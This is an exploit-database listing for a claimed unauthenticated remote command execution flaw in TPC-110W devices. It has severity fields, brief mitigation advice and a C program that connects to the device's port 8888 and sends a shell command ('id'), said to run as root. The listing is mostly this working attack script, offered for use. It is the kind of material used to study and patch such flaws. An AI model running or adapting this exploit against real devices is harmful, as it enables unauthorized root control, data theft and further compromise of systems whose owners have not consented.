header-logo
Suggest Exploit
vendor:
TPC-110W
by:
Anonymous
6.1
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: TPC-110W
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

TPC-110W Remote Command Execution Vulnerability

The code snippet provided is an example of a remote command execution vulnerability in TPC-110W devices. By exploiting this vulnerability, an attacker can execute arbitrary commands on the target device with root privileges. This can lead to unauthorized access, data theft, or further compromise of the device. This vulnerability does not have a specific CVE assigned.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the TPC-110W device to the latest version provided by the vendor. Additionally, restrict network access to the device and implement strong firewall rules to prevent unauthorized access.
Source

Exploit-DB raw data:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in serv_addr;
    char command[512];

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }

    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
    if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
        perror("inet_pton");
        exit(1);
    }

    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        perror("connect");
        exit(1);
    }

    // Run command with root privileges
    snprintf(command, sizeof(command), "id\n"); // Check user id
    write(sock, command, strlen(command));

    memset(command, '0', sizeof(command));
    read(sock, command, sizeof(command));
    printf("%s\n", command);

    close(sock);
    return 0;
}

//gcc -o tpc-110w-exploit tpc-110w-exp

Navigation

Suggest Exploit

Services By CQR